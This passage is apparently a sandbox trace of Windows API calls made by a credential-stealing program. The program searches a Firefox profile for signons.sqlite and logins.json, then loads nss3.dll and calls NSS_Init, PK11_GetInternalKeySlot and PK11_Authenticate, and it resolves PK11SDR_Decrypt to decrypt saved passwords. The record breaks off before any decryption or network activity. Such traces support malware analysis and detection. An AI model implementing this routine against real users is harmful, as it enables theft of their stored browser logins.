(uFlags=0x40, uBytes=0x134) returned 0x5d7dd0 [0588.513] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat", lpDst=0x5d7dd0, nSize=0x5a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat") returned 0x5a [0588.513] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.513] CloseHandle (hObject=0x4d8) returned 1 [0588.514] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.514] GetFileSize (in: hFile=0x4d8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc91 [0588.514] CreateFileMappingW (hFile=0x4d8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5b4 [0588.514] MapViewOfFile (hFileMappingObject=0x5b4, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0588.534] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57bf90 [0588.534] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0588.535] CloseHandle (hObject=0x5b4) returned 1 [0588.535] CloseHandle (hObject=0x4d8) returned 1 [0588.535] LocalFree (hMem=0x5d7dd0) returned 0x0 [0588.535] StrStrIW (lpFirst="pluginreg.dat", lpSrch="signons.sqlite") returned 0x0 [0588.535] StrStrIW (lpFirst="pluginreg.dat", lpSrch="logins.json") returned 0x0 [0588.535] LocalFree (hMem=0x5d7c90) returned 0x0 [0588.535] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0588.535] lstrlenW (lpString="\\") returned 1 [0588.535] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0588.535] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c38 [0588.535] lstrlenW (lpString="prefs.js") returned 8 [0588.535] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0588.535] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x5d7c90 [0588.535] LocalFree (hMem=0x578c38) returned 0x0 [0588.535] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.535] CloseHandle (hObject=0x4d8) returned 1 [0588.535] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x55 [0588.535] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x5d7dc8 [0588.535] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js", lpDst=0x5d7dc8, nSize=0x55 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js") returned 0x55 [0588.535] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.535] CloseHandle (hObject=0x4d8) returned 1 [0588.535] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.535] GetFileSize (in: hFile=0x4d8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1540 [0588.535] CreateFileMappingW (hFile=0x4d8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5b4 [0588.535] MapViewOfFile (hFileMappingObject=0x5b4, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0588.544] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c020 [0588.544] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0588.545] CloseHandle (hObject=0x5b4) returned 1 [0588.545] CloseHandle (hObject=0x4d8) returned 1 [0588.545] LocalFree (hMem=0x5d7dc8) returned 0x0 [0588.545] StrStrIW (lpFirst="prefs.js", lpSrch="signons.sqlite") returned 0x0 [0588.545] StrStrIW (lpFirst="prefs.js", lpSrch="logins.json") returned 0x0 [0588.545] LocalFree (hMem=0x5d7c90) returned 0x0 [0588.545] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0588.545] lstrlenW (lpString="\\") returned 1 [0588.545] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0588.545] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c38 [0588.545] lstrlenW (lpString="search.json") returned 11 [0588.545] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0588.545] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x5d7c90 [0588.545] LocalFree (hMem=0x578c38) returned 0x0 [0588.545] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.545] CloseHandle (hObject=0x4d8) returned 1 [0588.545] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x58 [0588.545] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x5d7dc8 [0588.545] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json", lpDst=0x5d7dc8, nSize=0x58 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json") returned 0x58 [0588.545] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.545] CloseHandle (hObject=0x4d8) returned 1 [0588.545] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.545] GetFileSize (in: hFile=0x4d8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4183 [0588.545] CreateFileMappingW (hFile=0x4d8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5b4 [0588.546] MapViewOfFile (hFileMappingObject=0x5b4, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0588.567] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c0b0 [0588.567] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0588.567] CloseHandle (hObject=0x5b4) returned 1 [0588.567] CloseHandle (hObject=0x4d8) returned 1 [0588.567] LocalFree (hMem=0x5d7dc8) returned 0x0 [0588.567] StrStrIW (lpFirst="search.json", lpSrch="signons.sqlite") returned 0x0 [0588.567] StrStrIW (lpFirst="search.json", lpSrch="logins.json") returned 0x0 [0588.567] LocalFree (hMem=0x5d7c90) returned 0x0 [0588.567] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0588.567] lstrlenW (lpString="\\") returned 1 [0588.567] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0588.567] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c38 [0588.567] lstrlenW (lpString="secmod.db") returned 9 [0588.567] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0588.567] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x5d7c90 [0588.568] LocalFree (hMem=0x578c38) returned 0x0 [0588.568] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.568] CloseHandle (hObject=0x4d8) returned 1 [0588.568] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x56 [0588.568] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x5d7dc8 [0588.568] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db", lpDst=0x5d7dc8, nSize=0x56 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db") returned 0x56 [0588.568] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.568] CloseHandle (hObject=0x4d8) returned 1 [0588.568] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.568] GetFileSize (in: hFile=0x4d8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4000 [0588.568] CreateFileMappingW (hFile=0x4d8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5b4 [0588.568] MapViewOfFile (hFileMappingObject=0x5b4, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0588.571] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c140 [0588.571] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0588.572] CloseHandle (hObject=0x5b4) returned 1 [0588.572] CloseHandle (hObject=0x4d8) returned 1 [0588.572] LocalFree (hMem=0x5d7dc8) returned 0x0 [0588.572] StrStrIW (lpFirst="secmod.db", lpSrch="signons.sqlite") returned 0x0 [0588.572] StrStrIW (lpFirst="secmod.db", lpSrch="logins.json") returned 0x0 [0588.572] LocalFree (hMem=0x5d7c90) returned 0x0 [0588.572] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0588.572] lstrlenW (lpString="\\") returned 1 [0588.572] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0588.572] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c38 [0588.572] lstrlenW (lpString="sessionstore.bak") returned 16 [0588.572] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0588.572] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56afc8 [0588.572] LocalFree (hMem=0x578c38) returned 0x0 [0588.572] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.572] CloseHandle (hObject=0x4d8) returned 1 [0588.572] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5d [0588.572] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56c300 [0588.572] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak", lpDst=0x56c300, nSize=0x5d | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak") returned 0x5d [0588.572] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.573] CloseHandle (hObject=0x4d8) returned 1 [0588.573] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.573] GetFileSize (in: hFile=0x4d8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbba [0588.573] CreateFileMappingW (hFile=0x4d8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5b4 [0588.573] MapViewOfFile (hFileMappingObject=0x5b4, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0588.579] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c1d0 [0588.579] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0588.579] CloseHandle (hObject=0x5b4) returned 1 [0588.579] CloseHandle (hObject=0x4d8) returned 1 [0588.587] LocalFree (hMem=0x56c300) returned 0x0 [0588.587] StrStrIW (lpFirst="sessionstore.bak", lpSrch="signons.sqlite") returned 0x0 [0588.587] StrStrIW (lpFirst="sessionstore.bak", lpSrch="logins.json") returned 0x0 [0588.587] LocalFree (hMem=0x56afc8) returned 0x0 [0588.587] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0588.587] lstrlenW (lpString="\\") returned 1 [0588.587] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0588.587] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c38 [0588.587] lstrlenW (lpString="sessionstore.js") returned 15 [0588.587] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0588.587] LocalAlloc (uFlags=0x40, uBytes=0x138) returned 0x5d7c90 [0588.587] LocalFree (hMem=0x578c38) returned 0x0 [0588.587] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.588] CloseHandle (hObject=0x4d8) returned 1 [0588.588] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5c [0588.588] LocalAlloc (uFlags=0x40, uBytes=0x138) returned 0x5d7dd0 [0588.588] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js", lpDst=0x5d7dd0, nSize=0x5c | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js") returned 0x5c [0588.588] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.588] CloseHandle (hObject=0x4d8) returned 1 [0588.588] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.588] GetFileSize (in: hFile=0x4d8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x23c [0588.588] CreateFileMappingW (hFile=0x4d8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5b4 [0588.588] MapViewOfFile (hFileMappingObject=0x5b4, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0588.589] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c260 [0588.589] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0588.590] CloseHandle (hObject=0x5b4) returned 1 [0588.590] CloseHandle (hObject=0x4d8) returned 1 [0588.590] LocalFree (hMem=0x5d7dd0) returned 0x0 [0588.590] StrStrIW (lpFirst="sessionstore.js", lpSrch="signons.sqlite") returned 0x0 [0588.590] StrStrIW (lpFirst="sessionstore.js", lpSrch="logins.json") returned 0x0 [0588.590] LocalFree (hMem=0x5d7c90) returned 0x0 [0588.590] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0588.590] lstrlenW (lpString="\\") returned 1 [0588.590] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0588.590] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c38 [0588.590] lstrlenW (lpString="signons.sqlite") returned 14 [0588.590] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0588.590] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x5d7c90 [0588.590] LocalFree (hMem=0x578c38) returned 0x0 [0588.590] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.590] CloseHandle (hObject=0x4d8) returned 1 [0588.591] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0588.591] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x5d7dd0 [0588.591] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite", lpDst=0x5d7dd0, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite") returned 0x5b [0588.591] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.591] CloseHandle (hObject=0x4d8) returned 1 [0588.591] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.591] GetFileSize (in: hFile=0x4d8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x50000 [0588.591] CreateFileMappingW (hFile=0x4d8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5b4 [0588.591] MapViewOfFile (hFileMappingObject=0x5b4, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x24c0000 [0588.619] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c2f0 [0588.619] UnmapViewOfFile (lpBaseAddress=0x24c0000) returned 1 [0588.622] CloseHandle (hObject=0x5b4) returned 1 [0588.622] CloseHandle (hObject=0x4d8) returned 1 [0588.622] LocalFree (hMem=0x5d7dd0) returned 0x0 [0588.622] StrStrIW (lpFirst="signons.sqlite", lpSrch="signons.sqlite") returned="signons.sqlite" [0588.622] SetDllDirectoryW (lpPathName="C:\\Program Files (x86)\\Mozilla Firefox") returned 1 [0588.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 76 [0588.622] LocalAlloc (uFlags=0x40, uBytes=0xcd) returned 0x5977a0 [0588.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default", cchWideChar=-1, lpMultiByteStr=0x5977a0, cbMultiByte=76, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default", lpUsedDefaultChar=0x0) returned 76 [0588.622] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0588.622] LoadLibraryW (lpLibFileName="nss3.dll") returned 0x74490000 [0589.178] GetProcAddress (hModule=0x74490000, lpProcName="NSS_Init") returned 0x7454d70b [0589.179] GetProcAddress (hModule=0x74490000, lpProcName="NSS_Shutdown") returned 0x7454d13c [0589.180] GetProcAddress (hModule=0x74490000, lpProcName="SECITEM_FreeItem") returned 0x7454e656 [0589.180] GetProcAddress (hModule=0x74490000, lpProcName="PK11_GetInternalKeySlot") returned 0x744e3c51 [0589.180] GetProcAddress (hModule=0x74490000, lpProcName="PK11_Authenticate") returned 0x744cd3ca [0589.180] GetProcAddress (hModule=0x74490000, lpProcName="PK11SDR_Decrypt") returned 0x744e00a7 [0589.180] GetProcAddress (hModule=0x74490000, lpProcName="PK11_FreeSlot") returned 0x744e3333 [0589.181] NSS_Init () returned 0x0 [0589.407] PK11_GetInternalKeySlot () returned 0x372d000 [0589.407] PK11_Authenticate () returned 0x0 [0589.407] 